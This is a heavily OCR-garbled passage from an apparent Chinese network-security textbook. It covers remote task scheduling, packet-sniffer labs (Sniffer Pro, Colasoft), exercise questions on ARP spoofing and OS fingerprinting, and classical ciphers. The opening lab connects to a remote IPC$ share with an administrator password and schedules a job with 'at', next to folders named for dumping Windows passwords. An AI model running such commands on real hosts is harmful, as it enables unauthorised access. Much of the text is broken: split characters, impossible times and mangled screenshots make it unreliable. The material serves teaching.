2002-18-19 04:51a <DIR> Program Files = 

2002-10-19 05:01a <DIR> Inetpub 

2003-11-08 89:31p <DIR> passdump 

2003-11-08 69:32p <DIR> 得 到 Windows 密 码 

2003-11-04  09:35p «DIR» HyperSnap-DX 4 了 

ll ————————————í np 
图 2-22 查看 文件 


(5) at 指令 。 
【任务 2-4】 创建 定时 器 ,如 图 2-23、 图 2-24 所 示 。 


net use * /del 

net use \\172. 18. 25. 109Nipc $ 123456 /user:administrator 
net time \\172. 18. 25. 109 

at 8:40 notepad. exe 


图 2-23 创建 定时 器 


实践 


C:N»net use x /del 
您 有 以 下 的 远程 连接 ， 


NN172.18.25.109Vipc$ 


RFE? (Y/N) [N]: y 


C:\>net use \\172.18.25.109\ipc$ 123456 /user:administrator 
== 
w LI 


C:\>net time NN172.18.25.1 
A172.18.25.109 ER 2003/11/14 上 午 08:31 
命令 成 功 完成 。 

C:\>at 8:40 notepad. exe 

新 加 了 一 项 作业 ， 其 作业 ID = 


C:\>, 局 
=== as a= a= === sf 


图 2-24 应 用 定时 器 


[3:5 2-2] 网 络 协议 分 析 


网 络 分 析 又 称 为 协议 分 析 , 是 指使 用 专业 软件 记录 通过 交换 机 端口 的 所 有 网 络 数据 , 按 
照 网 络 体系 结构 对 数据 的 协议 和 内 容 进行 分 析 统 计 的 过 程 。 网 络 分 析 可 以 作为 学 习 网 络 的 
有 效 工 具 , 也 可 以 作为 网 络 协议 设计 、 网 络 应 用 调试 的 强力 武器 ,但 最 常见 的 还 是 作为 网 络 
管理 与 故障 分 析 工 具 。 目 前 著名 的 常用 网 络 分 析 软 件 有 Ethereal, Sniffer pro, 国 内 比较 知 
名 是 科 来 网 络 分 析 软 件 。 

网 络 协 议 分 析 软 件 以 嗅 探 方 式 工作 ,必须 采集 到 网 络 中 的 原始 数据 包 , 才 能 准确 分 析 网 
络 故 障 。 但 如 果 安 装 的 位 置 不 当 , 采 集 到 的 数据 包 将 会 存在 较 大 的 差别 ,从 而 会 影响 分 析 的 
结果 ,并 导致 上 述 问题 的 出 现 。 鉴 于 这 种 情况 ,对 网 络 协议 分 析 软 件 的 安装 部 署 进行 了 解 非 
常 有 必要 。 一 般 情 况 下 ,网 络 协议 分 析 软 件 的 安装 部 署 会 遇 到 以 下 几 种 情况 。 

(1) 共享 式 网 络 。 使 用 集线器 (Hub) 作 为 网 络 中 心 交换 设备 的 网 络 即 为 共享 式 网 络 ， 
集线器 以 共享 模式 工作 在 OSI 层次 的 物理 层 。 如 果 局 域 网 的 中 心 交换 设备 是 集线器 ,可 将 
网 络 协议 分 析 软 件 安装 在 局 域 网 中 的 任意 一 台 主 机 上 ,此 时 软件 可 以 捕获 整个 网 络 中 所 有 
的 数据 通信 ,如 图 2-25 所 示 。 

(2) 具备 镜像 功能 的 交换 式 网 络 。 使 用 交换 机 (Switch) 作为 网 络 中 心 交 换 设备 的 网 络 
即 为 交换 式 网 络 。 交 换 机 工作 在 OSI 模型 的 数据 链接 层 . 它 的 各 端口 之 间 能 有 效 分 隔 冲突 
域 ,由 交换 机 连接 的 网 络 会 将 整个 网 络 分 隔 成 很 多 小 的 网 域 。 如 果 网 络 中 的 交换 机 具备 镜 
像 功能 ,可 先 在 交换 机 上 配置 好 端口 镜像 ,再 将 网 络 协议 分 析 软 件 安装 在 连接 镜像 端口 的 主 
机 上 ,此 时 软件 可 以 捕获 整个 网 络 中 的 所 有 数据 通信 ,如 图 2-26 所 示 。 


路 由 器 s 


集线器 (Hub) 


服务 器 工作 士 机 


图 2-25 共享 式 网 络 下 安装 简 图 


服务 器 工作 主机 
图 2-26 具备 镜像 功能 的 交换 式 网 络 下 安装 简 图 


(3) 不 具备 镜像 功能 的 交换 式 网 络 。 一 些 简 易 的 交换 机 可 能 并 不 具备 镜像 功能 ,不 能 
通过 端口 镜像 实现 网 络 的 监控 分 析 。 这 时 ,可 采取 在 交换 机 与 路 由 器 (或 防火 墙 ) 之 间 串 接 
一 个 分 路 器 (Tap) 或 集线器 (Hub) 的 方法 来 完成 数据 捕获 。 定 点 分 析 一 个 部 门 或 一 个 网 段 
在 实际 情况 中 网 络 的 拓扑 结构 往往 非常 复杂 ,在 进行 网 络 分 析 时 ,并 不 需要 分 析 整 个 网 络 ， 
只 需要 对 某 些 异 常 的 工作 部 门 或 网 段 进行 分 析 。 这 种 情况 下 ,将 网 络 协议 分 析 软 件 安装 于 
移动 电脑 上 ,再 附加 一 个 分 路 器 或 集线器 ,就 可 以 很 方便 地 实现 任意 部 门 或 任意 网 段 的 数据 
捕获 ,安装 简 图 如 图 2-27 所 示 。 

(4) 代理 服务 器 共享 上 网 。 当 前 的 小 型 网 络 中 ,有 很 大 一 部 分 都 可 能 仍然 通过 代理 服 
务 器 共享 上 网 ,对 这 种 网 络 的 分 析 , 直 接 将 网 络 分 析 软 件 安装 在 代理 服务 器 上 就 可 以 了 ,如 
图 2-28 所 示 。 

注意 : 这 种 情况 下 的 分 析 需 要 同时 对 代理 服务 器 的 内 网 卡 和 外 网 卡 进行 数据 捕获 。 


实践 


安装 协议 分 析 软 件 


普通 交换 机 


服务 器 A 服务 器 B 工作 主机 A 工作 主机 B 
图 2-27 不 具备 镜像 功能 的 交换 式 网 络 下 安装 简 图 


【实验 2-2-1】 Sniffer Pro 软件 使 用 

【实验 目的 】 了 解 Sniffer 的 基本 作用 ,能 通过 Sniffer 对 指定 的 网 络 行为 所 产生 的 数 
据 包 进 行 抓 取 , 并 了 解 Sniffer 的 报 文 发 送 与 监视 功能 。 

【实验 环境 】 装 有 Windows 2000/XP 系统 的 计算 机 ,局域网 ,Sniffer Pro 软件 。 


【实验 内 容 】 
(1) 打开 Sniffer 软件 ,对 所 要 监听 的 网 卡 进行 选择 ,如 图 2-29 所 示 。 


代理 服务 器 安装 协议 分 析 软件 


Select Settings | 
Select settings for monitoring: 


Current mediun Ethernet 802.3 
Line, 10 Mbps 


Wiss 工作 证 机 
图 2-28 ”代理 服务 器 共享 上 网 下 安装 简 图 图 2-29 网卡 选 择 

(2) 选择 网 卡 后 ,进入 Sniffer 工作 主 界面 ,对 主 界面 上 的 操作 按钮 加 以 熟悉 。 

(3) 设置 捕获 条 件 进行 抓 包 。 基 本 的 捕获 条 件 有 两 种 , 链 路 层 捕获 按 源 MAC 和 目的 
MAC 地 址 进行 捕获 ,输入 方式 为 十 六 进 制 连续 输入 ,如 00E0FC123456; IP 层 捕获 按 源 了 
和 目的 IP 进行 捕获 ,输入 方式 为 点 间隔 方式 ,如 10. 107. 1. 1, 如 图 2-30 所 示 。 如 果 选 择 IP 
层 捕获 条 件 , 则 ARP 等 报 文 将 被 过 滤 掉 。 
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图 2-30 设置 捕获 条 件 
(4) 切换 到 Advance 选项 卡 ,编辑 协议 捕获 条 件 , 如 图 2-31 所 示 。 
Dofine Filter P 2x 
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图 2-31 高 级 捕获 条 件 编辑 图 


在 协议 选择 树 中 可 以 选择 需要 捕获 的 协议 条 件 , 如 果 什 么 都 不 选 , 则 表示 忽略 该 条 件 ， 
捕获 所 有 协议 。 

在 捕获 帧 长 度 条 件 下 ,可 以 捕获 等 于 、 小 于 、 大 于 某 个 值 的 报 文 。 

在 错误 帧 是 否 捕获 栏 , 可 以 选择 当 网 络 上 有 如 下 错误 时 是 否 捕获 。 

单 击 保存 过 滤 规 则 条 件 按钮 Profiles, 可 以 将 当前 设置 的 过 滤 规 则 进行 保存 ; 在 捕获 主 
面板 中 可 以 选择 保存 的 捕获 条 件 。 

O) 查看 捕获 的 报 文 。Sniffer 软件 提供 了 强大 的 分 析 能 力 和 解码 功能 ,对 于 捕获 的 报 
文 提供 了 一 个 Expert 专家 分 析 系统 进行 分 析 , 还 有 解码 选项 及 图 形 和 表格 的 统计 信息 ,如 
图 2-32 所 示 。 


实践 


图 2-32 查看 报 文 


° 专家 分 分 析 系统 提供 了 一 个 智能 的 分 析 平 台 , 对 网 络 上 的 流量 进行 了 一 些 分 析 , 对 
于 分 析出 的 诊断 结果 可 以 通过 查看 在 线 帮 助 获 得 。 
例如 ,图 2-33 中 显示 了 网 络 中 WINS 查询 失败 的 次 数 及 TCP 重 传 的 次 数 统计 等 内 容 ， 
用 户 可 以 方便 地 了 解 网 络 中 高 层 协议 可 能 出 现 故障 的 点 。 
对 于 某 项 统计 分 析 , 可 以 通过 用 鼠标 双击 此 条 记录 的 方式 查看 详细 统计 信息 , 且 对 于 每 
一 项 都 可 以 通过 查看 帮助 来 了 解 其 产生 的 原因 ,如 图 2-33 所 示 。 
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图 2-33 查看 详细 信息 


t 解码 分 析 。 对 捕获 报 文 进行 解码 的 显示 通常 分 为 3 部 分 ,目前 大 部 分 此 类 软件 结构 
都 采用 这 种 结构 显示 。 解 码 主要 要 求 分 析 人 员 对 协议 比较 熟悉 ,这 样 才能 看 懂 解 
析出 来 的 报 文 。 使 用 该 软件 是 很 简单 的 事情 ,要 能 够 利用 软件 解码 分 析 来 解决 问 
题 的 关键 是 要 对 各 种 层次 的 协议 了 解 得 比较 透彻 ,工具 软件 只 是 提供 一 个 辅助 的 
TE. 
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对 于 MAC 地 址 ,Snffier 软件 进行 了 头 部 的 替换 ,如 00e0fc 开头 就 替换 成 Huawei, 这 
样 有 利于 了 解 网 络 上 各 种 相关 设备 制造 厂商 的 信息 ,如 图 2-34 所 示 。 功 能 是 按照 过 滤器 设 
置 的 过 滤 规 则 进行 数据 的 捕获 或 显示 。 在 菜单 上 的 位 置 分 别 为 Capture 一 Define Filter 和 
Display-Define Filter, 


[Sni £2. cap: Decode, 1/3803 Ethernet = 


[10.11. 
027247 


àR 

ARP: Hardware type = 1 (10Hb Ethernet) 
ÀRP: Protocol type = 0800 (IP) 

ÀRP: Length of ha are address = 6 bytes 


Lenakh nf 


nrnatnaonl address = À hwtac = 
, 

: ad 7b fe 84 00 e0 fc 00 11 ER 
00000010: 08 D0 06 04 OU 0i DU eO fc DO 11 图 4 E 
00000020: 00 00 00 00 00 00 Da 0b 69 3a no 00 o) WA J 
00000030: 00 00 00 OO OO 00 00 00 3c dc 41 1f 
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过 滤器 可 以 根据 物理 地 址 或 IP Job fil Bp i PESE TT AB A ii o 

【问题 2-4] 按照 图 例 学 习 捕获 IP 数据 包 , 并 选取 其 中 一 条 记录 解释 其 构造 。 

【问题 2-5】 查看 Matrix、Host Table、Portocol Dist 及 Statistics 选项 卡 , 并 解释 每 个 
选项 卡 中 主要 描述 了 网 络 什 么 样 的 信息 。 

【问题 2-6】 ARP 欺骗 过 程 中 捕获 报 文 并 进行 修改 的 目的 是 什么 ? 修改 的 是 以 太 网 帧 
的 哪 部 分 内 容 ? 

【问题 2-7】 用 实例 证 明 TCP 的 3 次 握手 协议 ,截图 说 明 。 

【问题 2-8】 若 要 捕获 从 本 机 上 发 出 的 去 往 www. sohu. com 的 上 行 报 文 ,请 写 出 
Sniffer 操作 的 一 整套 流程 ,并 对 捕获 到 的 报 文选 取 其 中 一 条 进行 详细 解释 ,主要 是 过 滤器 
的 设置 部 分 。 

【实验 2-2-2) 科 来 网 络 分 析 软 件 使 用 

与 Sniffer 相似 , 科 来 网 络 分 析 软 件 的 主要 功能 有 数据 采集 数据 过 滤 .协议 分 析 、 数 据 
统计 专家 诊断 .实时 监控 .数据 包 解码 及 数据 输出 等 。 

【实验 目的 】 能 够 使 用 网 络 分 析 软 件 分 析 网 络 主干 流量 ,分 析 网 络 潜在 问题 ,并 给 出 分 
析 数 据 。 

【实验 环境 】 装 有 Windows 2000/XP 系统 的 计算 机 ,局 域 网 , 科 来 网 络 分 析 软 件 。 


实践 


【实验 步骤 】 

CD 安装 科 来 网 络 分 析 软 件 。 

(2) 运行 科 来 网 络 分 析 软 件 。 

(3) 查找 科 来 网 络 分 析 软 件 使 用 相关 资料 。 

(4) 采集 网 络 流量 并 进行 分 析 。 

【常规 设置 说 明 】 

在 科 来 网 络 分 析 系 统 6. 0 的 “工程 设置 ”对话 框 中 可 对 工程 的 一 些 基本 信息 进行 设置 ， 
如 图 2-35 所 示 。 
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DRAAMAT REMM 
小 据 统计 设置 
局 用 每 个 网 络 端点 的 详细 协议 统计 . 
口 启 用 洋 组 的 数据 包 大 小 撤 计 
局 用 自 定义 端口 
当 开始 捕获 数据 时 总 是 显示 工程 设置 . 


口 保存 为 默认 设置 


图 2-35 工程 设置 中 的 常规 设置 界面 


常规 设置 主要 包括 数据 包 缓存 设置 数据 包 文件 保存 设 定数 据 统计 设置 、 自 定义 端口 
设置 ,下 面 分 别 对 其 进行 介绍 。 
数据 包 缓存 即 保存 捕获 到 的 数据 包 的 区 域 ,在 分 析 中 起 到 高 速 存储 数据 的 作用 。 系 统 
在 捕获 到 数据 包 后 ,首先 将 数据 包 保存 在 缓存 中 ,在 保存 工程 时 再 将 缓存 中 的 数据 保存 到 磁 
盘 。 缓 存 的 大 小 取决 于 需要 保存 的 数据 和 计算 机 可 用 物理 内 存 的 大 小 ,建议 缓存 的 大 小 低 
于 可 用 物理 内 存 的 50% ,系统 默认 是 16384 千 字 节 (KB) ,用 户 可 根据 自己 的 实际 情况 进行 
更 改 。 
由 于 缓存 是 有 大 小 限制 的 ,所 以 缓存 总 有 满 的 时 候 ,在 缓存 装 满 时 ,系统 提供 了 以 下 4 
种 处 理 方法 , 且 默 认 采 用 “丢弃 最 老 的 数据 包 ( 循 环 缓存 )” 方 法 。 
。 丢弃 最 老 的 数据 包 (循环 缓存 ): 当 捕 获 的 数据 达到 缓存 的 设 定 值 时 ,系统 将 会 丢弃 
缓存 中 最 早 保存 的 数据 包 , 然 后 保存 新 捕获 到 的 数据 包 。 
t 丢弃 新 捕获 的 数据 包 : 当 捕获 的 数据 达到 缓存 的 设 定 值 时 ,新 捕获 的 数据 包 在 被 统 
计 分 析 后 直接 丢弃 。 
。 丢弃 缓存 内 所 有 的 数据 包 : 当 捕 获 的 数据 达到 缓存 的 设 定 值 时 ,系统 将 清空 缓存 然 


后 再 保存 新 捕获 到 的 数据 包 。 
* 停止 捕捉 数据 包 : 当 捕 获 的 数据 达到 缓存 的 设 定 值 时 ,系统 停止 捕捉 数据 包 , 即 系 
统 停止 工作 。 

勾 选 自动 保存 数据 包 文件 ” 复 选 框 ,系统 会 自动 保存 捕获 到 的 原始 数据 包 。 数 据 包 文 
件 可 以 保存 成 单个 文件 ,也 可 以 按时 间或 大 小 分 割 后 保存 为 多 个 文件 。 

数据 统计 设置 包括 两 个 选项 ,分 别 为 “启用 每 个 网 络 端 点 的 详细 协议 统计 ”和 “启用 详细 
的 数据 包 大 小 统计 ”。 启 用 每 个 网 络 端 点 的 详细 协议 统计 ,系统 会 统计 每 个 节点 所 使 用 的 具 
体 协 议 ,以 及 每 个 协议 所 对 应 的 具体 节点 信息 ,此 选项 系统 默认 启用 ; 启用 详细 的 数据 包 大 
小 统计 ,系统 会 统计 最 常见 的 10 个 数据 包 大 小 信息 ,此 选项 系统 默认 未 启用 。 

勾 选 “启用 自 定义 端口 " 复 选 框 ,右边 的 灰色 按钮 变 为 可 用 , 单 击 该 按钮 打开 “ 自 定义 端 
口 ” 对 话 框 ,在 对 话 框 中 用 户 可 对 系统 支持 分 析 的 协议 的 端口 进行 更 改 , 以 分 析 某 些 特定 的 
网 络 应 用 ,如 非 TCP 80 端口 的 HTTP 访问、 非 TCP 25 端口 的 SMTP 邮件 发 送 等 。 

勾 选 “ 当 开始 捕获 数据 时 总 是 显示 工程 设置 " 复 选 框 , 当 开始 捕获 时 总 是 显示 工程 设置 
对 话 框 ,每 次 开始 捕获 时 都 会 首先 弹出 工程 设置 对 话 框 ,系统 默认 选中 此 复 选 框 。 

勾 选 “保存 为 默认 设置 " 复 选 框 ,可 将 整个 工程 设置 对 话 框 的 内 容 保存 为 默认 设置 ,下 次 
打开 时 即 是 此 设置 ,如 图 2-36 所 示 。 
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E 2-36 ” 科 来 协议 分 析 图 


【思考 与 练习 】 

(1) 从 科 来 网 络 分 析 软 件 论 坛 上 下 载 问题 包 进行 分 析 , 并 解答 问题 。 
(2) 了 解 Ethereal 软件 的 功能 ,比较 与 科 来 的 异同 。 

(3) 能 否 用 科 来 网 络 分 析 软 件 发 现 黑客 人 侵 ? 


实践 


《DY 局 9 有 一 种 操作 系统 指纹 识别 方法 


(1) 因为 局 域 网 有 最 小 帧 长 的 限制 ,ping 命令 发 送 时 ,ICMP 数据 区 也 需要 封装 额外 数 
据 以 满足 最 小 数据 报 长 度 的 要 求 。 这 段 数据 是 什么 ? 设计 一 个 方法 ,可 以 查看 到 在 
Windows 中 使 用 ping 命令 时 所 携带 数据 (ICMP 数据 区 ) 的 内 容 。 如 果 数 据 是 固定 的 , 且 与 
Linux 等 其 他 操作 系统 不 一 致 , 则 可 以 作为 操作 系统 探测 识别 的 依据 之 一 ,请 进一步 通过 试 
验 给 出 结论 。 

(2) 还 有 一 些 操作 系统 指纹 识别 的 方法 ,请 通过 查阅 资料 详细 给 出 相关 介绍 。 

(3) 请 记录 不 同 虚拟 机 的 MAC 地 址 ,看 看 它们 有 什么 规律 ,看 能 否 作为 一 种 虚拟 操作 
系统 的 指纹 识别 方法 。 请 试验 并 结合 查阅 资料 给 出 结论 。 
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数据 加 密 


信息 加 密 技 术 是 保障 信息 安全 的 核心 技术 ,已 经 渗透 到 大 部 分 安全 
产品 之 中 ,并 正 向 芯片 化 方向 发 展 。 通 过 数据 加 密 技 术 , 可 以 在 一 定 程 
度 上 提高 数据 传输 的 安全 性 ,保证 传输 数据 的 完整 性 。 一 个 数据 加 密 系 
统 包括 加 密 算法 、 明 文 、 密 文 以 及 密 钥 , 密 钥 控 制 加 密 和 解密 过 程 ,一 个 
加 密 系统 的 全 部 安全 性 是 基于 密 钥 的 ,而 不 是 基于 算法 ,所 以 加 密 系 统 
的 密 钥 管理 是 一 个 非常 重要 的 环节 。 


3.1 数据 加 密 技术 


数据 加 密 技术 主要 分 为 数据 传输 加 密 和 数据 存储 加 密 。 数 据 传输 
加 密 技术 主要 是 对 传输 中 的 数据 流 进行 加 密 , 常 用 的 有 链 路 加 密 、 节 点 
加 密 和 端 到 端 加 密 3 种 方式 。 

(1) 链 路 加 密 是 传输 数据 仅 在 物理 层 上 的 数据 链 路 层 进行 加 密 , 不 
考虑 信 源 和 信和 宿 , 它 用 于 保护 通信 节点 间 的 数据 。 接 收 方 是 传送 路 径 上 
的 各 台 节 点 机 ,数据 在 每 台 节点 机 内 都 要 被 解密 和 再 加 密 , 依 次 进行 , 直 
至 到 达 目 的 地 。 

(2) 与 链 路 加 密 类 似 的 节点 加 密 方法 在 节点 处 采用 一 个 与 节点 机 相 
连 的 密码 装置 , 密 文 在 该 装置 中 被 解密 并 被 重新 加 密 ,明文 不 通过 节点 
机 ,避免 了 链 路 加 密 节 点 处 易 受 攻击 的 缺点 。 

(3) 端 到 端 加 密 是 为 数据 从 一 端 到 另 一 端 提供 的 加 密 方式 。 数 据 在 
发 送 端 被 加 密 ,在 接收 端 解 密 , 中 间 节 点 处 不 以 明文 的 形式 出 现 。 端 到 
端 加 密 是 在 应 用 层 完成 的 。 在 端 到 端 加 密 中 ,数据 传输 单位 中 除 报头 外 
的 报 文 均 以 密 文 的 形式 贯穿 于 全 部 传输 过 程 ,只 是 在 发 送 端 和 接收 端 才 
有 加 、 解 密 设备 .而 在 中 间 任 何 节点 报 文 均 不 解密 。 因 此 ,不 需要 有 密码 
设备 , 同 链 路 加 密 相 比 ,可 减少 密码 设备 的 数量 。 另 一 方面 ,数据 传输 单 
位 由 报头 和 报 文 组 成 , 报 文 为 要 传送 的 数据 集合 ,报头 为 路 由 选择 信息 
等 (因为 端 到 端 传输 中 要 涉及 路 由 选择 )。 在 链 路 加 密 时 , 报 文 和 报头 两 
者 均 须 加 密 。 而 在 端 到 端 加 密 时 ,由 于 通路 上 的 每 一 个 中 间 节 点 虽 不 对 
报 文 解密 ,但 为 将 报 文 传送 到 目的 地 ,所 以 必须 检查 路 由 选择 信息 ,因此 
只 能 加 密 报 文 ,而 不 能 对 报头 加 密 。 这 样 就 容易 被 某 些 通 信 分 析 发 觉 ， 
而 从 中 获取 某 些 敏 感 信息 。 


实践 


链 路 加 密 对 用 户 来 说 比较 容易 ,使 用 的 密 钥 较 少 ,而 端 到 端 加 密 比 较 灵 活 , 对 用 户 可 见 。 
在 对 链 路 加 密 中 各 节点 安全 状况 不 放心 的 情况 下 也 可 使 用 端 到 端 加 密 方式 。 


3.2 数据 加 密 技 术 的 发 展 


1. 密码 专用 芯片 集成 


密码 技术 也 正 向 芯片 化 方向 发 展 ,在 芯片 设计 制造 方面 ,目前 微 电 子 工 艺 已 经 发 展 到 很 
高 水 平 ,芯片 设计 的 水 平 也 很 高 。 我 国 在 密码 专用 芯片 领域 的 研究 起 步 落后 于 国外 ,近年 来 
我 国 集成 电路 产业 技术 的 创新 和 自我 开发 能 力 得 到 了 加 强 , 微 电子 工业 得 到 了 发 展 ,从 而 
推动 了 密码 专用 芯片 的 发 展 。 加 快 密码 专用 芯片 的 研制 将 会 推动 我 国信 息 安 全 系统 的 


完善 。 
2. 量子 加 密 技术 的 研究 


量子 技术 在 密码 学 上 的 应 用 分 为 两 类 ,一 类 是 利用 量子 计算 机 对 传统 密码 体制 进行 分 
析 ; 另 一 类 是 利用 单 光 子 的 测 不 准 原理 在 光纤 一 级 实现 密 钥 管理 和 信息 加 密 , 即 量 子 密码 
学 。 量 子 计 算 机 相当 于 一 种 传统 意义 上 的 超大 规模 并 行 计 算 系 统 , 利 用 量子 计算 机 ,可 以 
在 几 秒 钟 内 分 解 RSA 129 的 公 钥 。 根 据 互联 网 的 发 展 , 全 光纤 网 络 将 是 今后 网 络 连接 的 
发 展 方向 ,利用 量子 技术 可 以 实现 传统 的 密码 体制 ,在 光纤 一 级 完成 密 钥 交换 和 信息 加 
密 , 其 安全 性 是 建立 在 Heisenberg 的 测 不 准 原理 之 上 的 ,如 果 攻 击 者 企图 接收 并 检测 信 
息 发 送 方 的 信息 (偏振 ), 则 将 造成 量子 状态 的 改变 ,这 种 改变 对 攻击 者 而 言 是 不 可 恢复 
的 ,而 对 收发 方 则 可 很 容易 地 检测 出 信息 是 否 受 到 攻击 。 目 前 量子 加 密 技术 仍然 处 于 研 
究 阶段 。 


3.3 数据 加 密 算 法 


数据 加 密 算法 有 很 多 种 ,密码 算法 标准 化 是 信息 化 社会 发 展 的 必然 趋势 ,是 世界 各 国保 
密 通 信和 领域 的 一 个 重要 课题 。 按 照发 展 进程 来 分 ,数据 加 密 算法 经 历 了 古典 密码 、 对 称 密 钥 
密码 和 公开 密 钥 密码 阶段 。 古 典 密码 算法 有 蔡 代 加 密 、 置 换 加 密 ; 对 称 加 密 算 法 包括 DES 
和 AES; 非 对 称 加 密 算 法 包括 RSA, 背包 密码 \McEliece 密码 .Rabin 及 椭圆 曲线 等 。 目 前 
在 数据 通信 中 使 用 最 普遍 的 算法 有 DES 算法 .RSA 算法 和 PGP 算法 等 。 


3.3.1 古典 密码 算法 


1. 凯撒 《密码 


凯撒 密码 (Caesar Shifts, Simple Shift) 也 称 凯撒 移 位 ,是 最 简单 的 加 密 方法 之 一 ,相传 
是 古 罗马 凯撒 大 帝 用 来 保护 重要 军情 的 加 密 系统 , 它 是 一 种 替代 密码 。 
。 MEAR: 密 文 =( 明 文 十 位 移 数 ) Mod 26, 


t 解密 公式 : 明文 一 ( 密 文 一 位 移 数 ) Mod 26 。 

以 《数字 城堡 ) 中 的 一 组 密码 "HL FKZC VD LDS” 为 例 , 只 需 把 每 个 字母 都 按 字母 表 中 
的 顺序 依次 后 移 一 个 字母 即 可 , 即 A 变 成 B.B 就 成 了 C, 依 此 类 推 。 因此 明文 为 “IM 
GLAD WE MET", 

英文 字母 的 移 位 以 移 25 位 为 一 个 循环 , 移 26 位 等 于 没有 移 位 。 所 以 可 以 用 穷 举 法 列 
出 所 有 可 能 的 组 合 。 例 如 “phhw ph diwhu wkh wrjd sduwb” 可 以 方便 地 列 出 所 有 组 合 , 然 
后 从 中 选 出 有 意义 的 话 ,可 知 明文 为 “meet me after the toga party". 


2. 频率 分 析 法 


频率 分 析 法 可 以 有 效 破解 单字 母 蔡 换 密码 。 
关于 词 频 问 题 的 密码 ,英文 字母 的 出 现 频率 如 表 3-1 所 示 。 


表 3-1 英文 字母 的 出 现 频率 


字母 频率 /% 字母 频率 /% 字母 频率 /% 字母 频率 /% 

a 8.2 b 1.5 c 2.8 d 4.3 
e 12.7 f 2.2 g 2.0 h 6.1 
i 7.0 j 0.2 k 0.8 i 4.0 
m 2.4 n 6.7 o 7.5 p 1.9 
q 0.1 r 6.0 s 6.3 t 9.1 
u 2.8 v 1.0 w 2.4 x 0.2 
y 2.0 z 0.1 


词 频 法 其 实 就 是 计算 各 个 字母 在 文章 中 的 出 现 频率 ,然后 大 概 猜测 出 明码 表 , 最 后 验证 
自己 的 推算 是 否 正确 。 这 种 方法 由 于 要 统计 字母 的 出 现 频率 ,需要 花费 时 间 较 长 。 


3. 维 吉 尼 亚 密码 


由 于 频率 分 析 法 可 以 有 效 破解 单 表 替换 密码 ,法国 密码 学 家 维 吉 尼 亚 于 1586 年 提出 一 
种 多 表 蔡 换 密码 , 即 维 吉 尼 亚 密码 ,也 称 维 热 纳 尔 密码 。 维 吉 尼 亚 密码 引入 了 * 密 钥 ” 的 概 
念 , 即 根据 密 钥 来 决定 用 哪 一 行 的 密 表 来 进行 蔡 换 ,以 此 来 对 抗 字 频 统计 。 

° 加 密 算法 : 例如 密 钥 的 字母 为 [dj ,明文 对 应 字母 Lb]。 根 据 字母 表 的 顺序 [dj 二 4， 
[bj]==2, 那 么 密 文 就 是 [dj 十 [bj-1==4 十 2-1 二 5 二 [ej, 因 此 加 密 的 结果 为 [e]。 解 密 
即 做 逆 运 算 。 

* MEAR: 密 文 二 ( 明 文 十 密 钥 ) Mod 26 一 1。 

。 MEAR: 明文 一 [26 十 ( 密 文 一 密 钥 )] Mod 26 十 1。 

假如 对 明文 “to be or not to be that is the question” I% ,当选 定 “have” 作 为 密 钥 时 ,加 

密 过 程 是 : 密 钥 第 一 个 字母 为 Ch], 明文 第 一 个 为 [tj], 因 此 可 以 找到 在 bh 行 t 列 中 的 字母 
[aj, 依 此 类 推 ,得 出 对 应 关系 如 下 。 
密 钥 : ha ve ha veh av eh aveh av eha vehaveha 


实践 


明文 : to be or not to be that is the question 


密 文 : ao wi vr isa tj fl tcea in xoe lylsomvn 
4. 随机 乱 序 字 母 


随机 乱 序 字母 即 单字 母 蔡 换 密码 。 重 排 密码 表 26 个 字母 的 顺序 ,密码 表 会 增加 到 四 千 
亿 亿 亿 多 种 ,能 有 效 防止 用 筛选 的 方法 检验 所 有 密码 表 。 这 种 密码 持续 使 用 了 几 个 世纪 , 直 
到 阿拉 伯 人 发 明了 频率 分 析 法 。 

。 明码 表 : ABCDEFGHIJKLMNOPQRSTUVWXYZ 

。 密码 表 : QWERTYUIOPASDFGHJKLZXCVBNM 

例如 明文 为 forest, 则 密 文 为 gbmrst。 


3.3.2 现代 密码 体制 


古典 密码 学 中 提出 的 加 密 方案 是 一 种 算法 保护 的 方案 ,在 保密 方案 安全 的 情况 下 ， 
可 能 收 到 一 定 的 安全 效果 ,但 是 , 随 着 保密 方案 的 泄露 ,被 加 密 信息 的 安全 就 没有 了 安全 
保证 。 

除了 算法 的 复杂 度 ,现代 密码 学 与 古典 密码 学 比较 显著 的 不 同 之 处 在 于 ,相对 于 古典 密 
码 学 加 解密 流程 ( 见 图 3-1) ,现代 密码 学 加 解密 流程 中 在 加 密 端 和 解密 端 分 别 多 了 加 密 密 
钥 和 解密 密 钥 ,如 图 3-2 所 示 。 这 样 ,对 于 加 密 的 明文 信息 的 保护 转变 为 对 密 钥 信息 的 保 
护 , 从 而 提高 了 加 密 的 安全 性 和 加 密 算法 的 生命 力 。 


加 密 方案 | eee 


电文 。| m 密 文 -| RE 原始 明文 


图 3-1 古典 密码 学 加 解密 流程 


加 密 


Wx pg | &X m 原始 明文 


图 3-2 现代 密码 学 加 解密 流程 


现代 密码 学 思想 的 核心 内 容 是 密码 体系 的 强度 不 能 依赖 于 对 算法 内 部 机 制 的 保密 。 
为 当 密 码 内 部 机 制 被 有 意 或 无 意 泄露 以 后 ,一 个 强度 高 的 密码 体制 还 能 依靠 它 的 密 钥 来 
维持 它 的 安全 性 ,而 一 个 强度 依赖 算法 内 部 机 理 的 体制 ,其 安全 问题 难以 保证 。 这 是 蓓 
兰 密码 学 家 A. Kerckhoffs(1835 一 1903) 最 早 阑 述 的 原则 , 即 密码 的 安全 必须 完全 寓于 密 
Lp um 

根据 密 钥 类 型 不 同 ,现代 密码 体制 可 分 为 两 类 ,一 类 是 对 称 密码 体制 ; 另 一 类 是 非 对 称 


加 密 
法 


密码 体制 。 对 称 密码 体制 是 加 密 和 解密 均 采用 同一 把 密 钥 ,算法 实现 速度 极 快 ,因此 有 着 广 
泛 的 应 用 ,最 著名 的 是 美国 数据 加 密 标准 DES、AES( 高 级 加 密 标准 ) 和 欧洲 数据 加 密 标准 
IDEA, 

非 对 称 密码 体制 采用 的 加 密 钥 匙 ( 公 钥 ) 和 解密 钥匙 ( 私 钥 ) 是 不 同 的 。 该 体制 的 安全 性 
都 基于 复杂 的 数学 难题 。RSA 系统 是 最 典型 的 方法 ,原理 简单 且 易 于 使 用 。DSA (Data 
Signature Algorition) 是 基于 离散 对 数 问题 的 数字 签名 标准 , 它 仅 提 供 数字 签名 ,不 提供 数 
据 加 密 功能 。 另 外 还 有 安全 性 高 .算法 实现 性 能 好 的 椭圆 曲线 加 密 算法 ECC (Elliptic 
Curve Cryptography) 等 。 

在 实际 应 用 中 , 非 对 称 密码 体制 并 没有 完全 取代 对 称 密码 体制 ,这 是 因为 非 对 称 密 码 体 
